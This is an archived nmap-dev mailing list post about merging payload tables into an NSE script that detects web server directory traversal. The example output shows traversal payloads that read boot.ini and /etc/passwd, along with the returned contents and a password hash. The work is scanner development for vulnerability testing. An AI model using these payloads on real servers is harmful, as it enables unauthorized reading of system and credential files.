Nmap Development mailing list archives

Re: [NSE] Webservers Directory Traversal Vulnerability (under windows)


From: Gutek <ange.gutek () gmail com>
Date: Sat, 19 Jun 2010 17:44:55 +0200

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Here is a merged version.
I just added checks for boot.ini to the original generic directory
escalation strings table. Those are "dots and slashes hexified".

Then I added another table for more specific payloads. The script has to
deal with them differently from the generic ones: they cannot always be
fully hexified, and sometimes they need a special prepend/append...
in a word, those strings have to be passed "as published" through the
GET request.

Concerning boot.ini: it exists on Windows <= XP, not on Vista or
Seven.

Example outputs:

-- @output
-- 80/tcp open  http
-- | http-passwd: Directory Traversal Found.
-- | Payload: "index.html?../../../../../boot.ini"
-- | Printing first 250 bytes:
-- | [boot loader]
-- | timeout=30
-- | default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
-- | [operating systems]
-- |_multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
--
--
-- 80/tcp open  http
-- | http-passwd: Directory Traversal Found.
-- | Payload: "../../../../../../../../../../etc/passwd"
-- | Printing first 250 bytes:
-- | root:$1$$iems.VX5yVMByaB1lT8fx.:0:0::/:/bin/sh
-- | sshd:*:65532:65534::/:/bin/false
-- | ftp:*:65533:65534::/:/bin/false
-- |_nobody:*:65534:65534::/:/bin/fals

A.G.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.12 (GNU/Linux)
Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org/

iEYEARECAAYFAkwc5fcACgkQ3aDTTO0ha7gQRQCfb9C72W3LHiunochL+S4G0rm3
fxkAoIROyqhoB1xoM84KX79IHrwYePUY
=2Jlp
-----END PGP SIGNATURE-----

Attachment: http-passwd.nse

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/